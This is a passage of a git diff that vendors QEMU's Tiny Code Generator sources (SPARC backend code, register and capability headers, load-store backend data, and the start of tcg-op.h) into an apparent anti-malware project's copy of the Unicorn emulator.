*/ + tcg_out_arithc(s, a0, a2, args[3], const_args[3], c); + if (SPARC64 || a0 <= TCG_REG_O7) { + tcg_out_arithi(s, a1, a0, 32, SHIFT_SRLX); + } else { + tcg_out_rdy(s, a1); + } + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, a0, a1, a2, args[3], false); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, a0, a1, a2, args[3], true); + break; + case INDEX_op_qemu_st_i32: + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, a0, a1, a2, args[3]); + break; + + case INDEX_op_ld32s_i64: + tcg_out_ldst(s, a0, a1, a2, LDSW); + break; + case INDEX_op_ld_i64: + tcg_out_ldst(s, a0, a1, a2, LDX); + break; + case INDEX_op_st_i64: + tcg_out_ldst(s, a0, a1, a2, STX); + break; + case INDEX_op_shl_i64: + c = SHIFT_SLLX; + do_shift64: + /* Limit immediate shift count lest we create an illegal insn. */ + tcg_out_arithc(s, a0, a1, a2 & 63, c2, c); + break; + case INDEX_op_shr_i64: + c = SHIFT_SRLX; + goto do_shift64; + case INDEX_op_sar_i64: + c = SHIFT_SRAX; + goto do_shift64; + case INDEX_op_mul_i64: + c = ARITH_MULX; + goto gen_arith; + case INDEX_op_div_i64: + c = ARITH_SDIVX; + goto gen_arith; + case INDEX_op_divu_i64: + c = ARITH_UDIVX; + goto gen_arith; + case INDEX_op_ext32s_i64: + tcg_out_arithi(s, a0, a1, 0, SHIFT_SRA); + break; + case INDEX_op_ext32u_i64: + tcg_out_arithi(s, a0, a1, 0, SHIFT_SRL); + break; + case INDEX_op_trunc_shr_i32: + if (a2 == 0) { + tcg_out_mov(s, TCG_TYPE_I32, a0, a1); + } else { + tcg_out_arithi(s, a0, a1, a2, SHIFT_SRLX); + } + break; + + case INDEX_op_brcond_i64: + tcg_out_brcond_i64(s, a2, a0, a1, const_args[1], args[3]); + break; + case INDEX_op_setcond_i64: + tcg_out_setcond_i64(s, args[3], a0, a1, a2, c2); + break; + case INDEX_op_movcond_i64: + tcg_out_movcond_i64(s, args[5], a0, a1, a2, c2, args[3], const_args[3]); + break; + case INDEX_op_add2_i64: + tcg_out_addsub2_i64(s, args[0], args[1], args[2], args[3], args[4], + const_args[4], args[5], const_args[5], false); + break; + case INDEX_op_sub2_i64: + tcg_out_addsub2_i64(s, 
args[0], args[1], args[2], args[3], args[4], + const_args[4], args[5], const_args[5], true); + break; + case INDEX_op_muluh_i64: + tcg_out_arith(s, args[0], args[1], args[2], ARITH_UMULXHI); + break; + + gen_arith: + tcg_out_arithc(s, a0, a1, a2, c2, c); + break; + + gen_arith1: + tcg_out_arithc(s, a0, TCG_REG_G0, a1, const_args[1], c); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef sparc_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "rZ", "r" } }, + { INDEX_op_st16_i32, { "rZ", "r" } }, + { INDEX_op_st_i32, { "rZ", "r" } }, + + { INDEX_op_add_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_mul_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_div_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_divu_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_sub_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_and_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_andc_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_or_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_orc_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_xor_i32, { "r", "rZ", "rJ" } }, + + { INDEX_op_shl_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_shr_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_sar_i32, { "r", "rZ", "rJ" } }, + + { INDEX_op_neg_i32, { "r", "rJ" } }, + { INDEX_op_not_i32, { "r", "rJ" } }, + + { INDEX_op_brcond_i32, { "rZ", "rJ" } }, + { INDEX_op_setcond_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_movcond_i32, { "r", "rZ", "rJ", "rI", "0" } }, + + { INDEX_op_add2_i32, { "r", "r", "rZ", "rZ", "rJ", "rJ" } }, + { INDEX_op_sub2_i32, { "r", "r", "rZ", 
"rZ", "rJ", "rJ" } }, + { INDEX_op_mulu2_i32, { "r", "r", "rZ", "rJ" } }, + { INDEX_op_muls2_i32, { "r", "r", "rZ", "rJ" } }, + + { INDEX_op_ld8u_i64, { "R", "r" } }, + { INDEX_op_ld8s_i64, { "R", "r" } }, + { INDEX_op_ld16u_i64, { "R", "r" } }, + { INDEX_op_ld16s_i64, { "R", "r" } }, + { INDEX_op_ld32u_i64, { "R", "r" } }, + { INDEX_op_ld32s_i64, { "R", "r" } }, + { INDEX_op_ld_i64, { "R", "r" } }, + { INDEX_op_st8_i64, { "RZ", "r" } }, + { INDEX_op_st16_i64, { "RZ", "r" } }, + { INDEX_op_st32_i64, { "RZ", "r" } }, + { INDEX_op_st_i64, { "RZ", "r" } }, + + { INDEX_op_add_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_mul_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_div_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_divu_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_sub_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_and_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_andc_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_or_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_orc_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_xor_i64, { "R", "RZ", "RJ" } }, + + { INDEX_op_shl_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_shr_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_sar_i64, { "R", "RZ", "RJ" } }, + + { INDEX_op_neg_i64, { "R", "RJ" } }, + { INDEX_op_not_i64, { "R", "RJ" } }, + + { INDEX_op_ext32s_i64, { "R", "r" } }, + { INDEX_op_ext32u_i64, { "R", "r" } }, + { INDEX_op_trunc_shr_i32, { "r", "R" } }, + + { INDEX_op_brcond_i64, { "RZ", "RJ" } }, + { INDEX_op_setcond_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_movcond_i64, { "R", "RZ", "RJ", "RI", "0" } }, + + { INDEX_op_add2_i64, { "R", "R", "RZ", "RZ", "RJ", "RI" } }, + { INDEX_op_sub2_i64, { "R", "R", "RZ", "RZ", "RJ", "RI" } }, + { INDEX_op_muluh_i64, { "R", "RZ", "RZ" } }, + + { INDEX_op_qemu_ld_i32, { "r", "A" } }, + { INDEX_op_qemu_ld_i64, { "R", "A" } }, + { INDEX_op_qemu_st_i32, { "sZ", "A" } }, + { INDEX_op_qemu_st_i64, { "SZ", "A" } }, + + { -1 }, +}; + +static void tcg_target_init(TCGContext *s) +{ + /* Only probe for the platform and capabilities if we havn't already + 
determined maximum values at compile time. */ +#ifndef use_vis3_instructions + { + unsigned long hwcap = qemu_getauxval(AT_HWCAP); + use_vis3_instructions = (hwcap & HWCAP_SPARC_VIS3) != 0; + } +#endif + + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffffffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, ALL_64); + + tcg_regset_set32(s->tcg_target_call_clobber_regs, 0, + (1 << TCG_REG_G1) | + (1 << TCG_REG_G2) | + (1 << TCG_REG_G3) | + (1 << TCG_REG_G4) | + (1 << TCG_REG_G5) | + (1 << TCG_REG_G6) | + (1 << TCG_REG_G7) | + (1 << TCG_REG_O0) | + (1 << TCG_REG_O1) | + (1 << TCG_REG_O2) | + (1 << TCG_REG_O3) | + (1 << TCG_REG_O4) | + (1 << TCG_REG_O5) | + (1 << TCG_REG_O7)); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_G0); /* zero */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_G6); /* reserved for os */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_G7); /* thread pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_I6); /* frame pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_I7); /* return address */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_O6); /* stack pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_T1); /* for internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_T2); /* for internal use */ + + tcg_add_target_add_op_defs(s, sparc_op_defs); +} + +#if SPARC64 +# define ELF_HOST_MACHINE EM_SPARCV9 +#else +# define ELF_HOST_MACHINE EM_SPARC32PLUS +# define ELF_HOST_FLAGS EF_SPARC_32PLUS +#endif + +void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + uint32_t *ptr = (uint32_t *)jmp_addr; + uintptr_t disp = addr - jmp_addr; + + /* We can reach the entire address space for 32-bit. For 64-bit + the code_gen_buffer can't be larger than 2GB. 
*/ + assert(disp == (int32_t)disp); + + *ptr = CALL | (uint32_t)disp >> 2; + flush_icache_range(jmp_addr, jmp_addr + 4); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.h new file mode 100644 index 0000000..b1b2265 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.h @@ -0,0 +1,167 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#ifndef TCG_TARGET_SPARC +#define TCG_TARGET_SPARC 1 + +#define TCG_TARGET_REG_BITS 64 + +#define TCG_TARGET_INSN_UNIT_SIZE 4 +#define TCG_TARGET_NB_REGS 32 + +typedef enum { + TCG_REG_G0 = 0, + TCG_REG_G1, + TCG_REG_G2, + TCG_REG_G3, + TCG_REG_G4, + TCG_REG_G5, + TCG_REG_G6, + TCG_REG_G7, + TCG_REG_O0, + TCG_REG_O1, + TCG_REG_O2, + TCG_REG_O3, + TCG_REG_O4, + TCG_REG_O5, + TCG_REG_O6, + TCG_REG_O7, + TCG_REG_L0, + TCG_REG_L1, + TCG_REG_L2, + TCG_REG_L3, + TCG_REG_L4, + TCG_REG_L5, + TCG_REG_L6, + TCG_REG_L7, + TCG_REG_I0, + TCG_REG_I1, + TCG_REG_I2, + TCG_REG_I3, + TCG_REG_I4, + TCG_REG_I5, + TCG_REG_I6, + TCG_REG_I7, +} TCGReg; + +#define TCG_CT_CONST_S11 0x100 +#define TCG_CT_CONST_S13 0x200 +#define TCG_CT_CONST_ZERO 0x400 + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_O6 + +#ifdef __arch64__ +#define TCG_TARGET_STACK_BIAS 2047 +#define TCG_TARGET_STACK_ALIGN 16 +#define TCG_TARGET_CALL_STACK_OFFSET (128 + 6*8 + TCG_TARGET_STACK_BIAS) +#else +#define TCG_TARGET_STACK_BIAS 0 +#define TCG_TARGET_STACK_ALIGN 8 +#define TCG_TARGET_CALL_STACK_OFFSET (64 + 4 + 6*4) +#endif + +#ifdef __arch64__ +#define TCG_TARGET_EXTEND_ARGS 1 +#endif + +#if defined(__VIS__) && __VIS__ >= 0x300 +#define use_vis3_instructions 1 +#else +extern bool use_vis3_instructions; +#endif + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 1 +#define TCG_TARGET_HAS_rem_i32 0 +#define TCG_TARGET_HAS_rot_i32 0 +#define TCG_TARGET_HAS_ext8s_i32 0 +#define TCG_TARGET_HAS_ext16s_i32 0 +#define TCG_TARGET_HAS_ext8u_i32 0 +#define TCG_TARGET_HAS_ext16u_i32 0 +#define TCG_TARGET_HAS_bswap16_i32 0 +#define TCG_TARGET_HAS_bswap32_i32 0 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_andc_i32 1 +#define TCG_TARGET_HAS_orc_i32 1 +#define TCG_TARGET_HAS_eqv_i32 0 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_nor_i32 0 +#define TCG_TARGET_HAS_deposit_i32 0 +#define TCG_TARGET_HAS_movcond_i32 1 +#define 
TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 1 +#define TCG_TARGET_HAS_muls2_i32 1 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_mulsh_i32 0 + +#define TCG_TARGET_HAS_trunc_shr_i32 1 +#define TCG_TARGET_HAS_div_i64 1 +#define TCG_TARGET_HAS_rem_i64 0 +#define TCG_TARGET_HAS_rot_i64 0 +#define TCG_TARGET_HAS_ext8s_i64 0 +#define TCG_TARGET_HAS_ext16s_i64 0 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 0 +#define TCG_TARGET_HAS_ext16u_i64 0 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_bswap16_i64 0 +#define TCG_TARGET_HAS_bswap32_i64 0 +#define TCG_TARGET_HAS_bswap64_i64 0 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_not_i64 1 +#define TCG_TARGET_HAS_andc_i64 1 +#define TCG_TARGET_HAS_orc_i64 1 +#define TCG_TARGET_HAS_eqv_i64 0 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 0 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 use_vis3_instructions +#define TCG_TARGET_HAS_mulsh_i64 0 + +#define TCG_AREG0 TCG_REG_I0 + +#ifdef _MSC_VER +#include +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + FlushInstructionCache(GetCurrentProcess(), (const void*)start, stop-start); +} +#else +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + uintptr_t p; + for (p = start & -8; p < ((stop + 7) & -8); p += 8) { + __asm__ __volatile__("flush\t%0" : : "r" (p)); + } +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-ldst.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-ldst.h new file mode 100644 index 0000000..429cba2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-ldst.h @@ -0,0 +1,91 @@ +/* + * TCG Backend Data: load-store 
optimization only. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ + +#ifdef CONFIG_SOFTMMU +#define TCG_MAX_QEMU_LDST 640 + +typedef struct TCGLabelQemuLdst { + bool is_ld; /* qemu_ld: true, qemu_st: false */ + TCGMemOp opc; + TCGType type; /* result type of a load */ + TCGReg addrlo_reg; /* reg index for low word of guest virtual addr */ + TCGReg addrhi_reg; /* reg index for high word of guest virtual addr */ + TCGReg datalo_reg; /* reg index for low word to be loaded or stored */ + TCGReg datahi_reg; /* reg index for high word to be loaded or stored */ + int mem_index; /* soft MMU memory index */ + tcg_insn_unit *raddr; /* gen code addr of the next IR of qemu_ld/st IR */ + tcg_insn_unit *label_ptr[2]; /* label pointers to be updated */ +} TCGLabelQemuLdst; + +typedef struct TCGBackendData { + int nb_ldst_labels; + TCGLabelQemuLdst ldst_labels[TCG_MAX_QEMU_LDST]; +} TCGBackendData; + + +/* + * Initialize TB backend data at the beginning of the TB. + */ + +static inline void tcg_out_tb_init(TCGContext *s) +{ + s->be->nb_ldst_labels = 0; +} + +/* + * Generate TB finalization at the end of block + */ + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l); +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l); + +static void tcg_out_tb_finalize(TCGContext *s) +{ + TCGLabelQemuLdst *lb = s->be->ldst_labels; + int i, n = s->be->nb_ldst_labels; + + /* qemu_ld/st slow paths */ + for (i = 0; i < n; i++) { + if (lb[i].is_ld) { + tcg_out_qemu_ld_slow_path(s, lb + i); + } else { + tcg_out_qemu_st_slow_path(s, lb + i); + } + } +} + +/* + * Allocate a new TCGLabelQemuLdst entry. 
+ */ + +static inline TCGLabelQemuLdst *new_ldst_label(TCGContext *s) +{ + TCGBackendData *be = s->be; + int n = be->nb_ldst_labels; + + assert(n < TCG_MAX_QEMU_LDST); + be->nb_ldst_labels = n + 1; + return &be->ldst_labels[n]; +} +#else +#include "tcg-be-null.h" +#endif /* CONFIG_SOFTMMU */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-null.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-null.h new file mode 100644 index 0000000..ba2da3c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-null.h @@ -0,0 +1,45 @@ +/* + * TCG Backend Data: No backend data + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg.h" + +typedef struct TCGBackendData { + /* Empty */ + char dummy; +} TCGBackendData; + + +/* + * Initialize TB backend data at the beginning of the TB. 
+ */ + +static inline void tcg_out_tb_init(TCGContext *s) +{ +} + +/* + * Generate TB finalization at the end of block + */ + +static inline void tcg_out_tb_finalize(TCGContext *s) +{ +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-op.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-op.h new file mode 100644 index 0000000..51a0631 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-op.h @@ -0,0 +1,2784 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#include "tcg.h" +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +int gen_new_label(TCGContext *); + +static inline void gen_uc_tracecode(TCGContext *tcg_ctx, int32_t size, int32_t type, void *uc, uint64_t pc) +{ + TCGv_i32 tsize = tcg_const_i32(tcg_ctx, size); + TCGv_i32 ttype = tcg_const_i32(tcg_ctx, type); + TCGv_ptr tuc = tcg_const_ptr(tcg_ctx, uc); + TCGv_i64 tpc = tcg_const_i64(tcg_ctx, pc); + gen_helper_uc_tracecode(tcg_ctx, tsize, ttype, tuc, tpc); +} + +static inline void tcg_gen_op0(TCGContext *s, TCGOpcode opc) +{ + *s->gen_opc_ptr++ = opc; +} + +static inline void tcg_gen_op1_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); +} + +static inline void tcg_gen_op1_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); +} + +static inline void tcg_gen_op1i(TCGContext *s, TCGOpcode opc, TCGArg arg1) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = arg1; +} + +static inline void tcg_gen_op2_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); +} + +static inline void tcg_gen_op2_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); +} + +static inline void tcg_gen_op2i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGArg arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = arg2; +} + +static inline void tcg_gen_op2i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGArg arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = arg2; +} + +static inline void tcg_gen_op2ii(TCGContext *s, TCGOpcode opc, TCGArg arg1, TCGArg 
arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = arg1; + *s->gen_opparam_ptr++ = arg2; +} + +static inline void tcg_gen_op3_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); +} + +static inline void tcg_gen_op3_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); +} + +static inline void tcg_gen_op3i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, + TCGv_i32 arg2, TCGArg arg3) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = arg3; +} + +static inline void tcg_gen_op3i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, + TCGv_i64 arg2, TCGArg arg3) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = arg3; +} + +static inline void tcg_gen_ldst_op_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 val, + TCGv_ptr base, TCGArg offset) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(val); + *s->gen_opparam_ptr++ = GET_TCGV_PTR(base); + *s->gen_opparam_ptr++ = offset; +} + +static inline void tcg_gen_ldst_op_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 val, + TCGv_ptr base, TCGArg offset) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(val); + *s->gen_opparam_ptr++ = GET_TCGV_PTR(base); + *s->gen_opparam_ptr++ = offset; +} + +static inline void tcg_gen_op4_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ 
= GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); +} + +static inline void tcg_gen_op4_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); +} + +static inline void tcg_gen_op4i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGArg arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = arg4; +} + +static inline void tcg_gen_op4i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGArg arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = arg4; +} + +static inline void tcg_gen_op4ii_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGArg arg3, TCGArg arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = arg3; + *s->gen_opparam_ptr++ = arg4; +} + +static inline void tcg_gen_op4ii_i64(TCGContext *s, 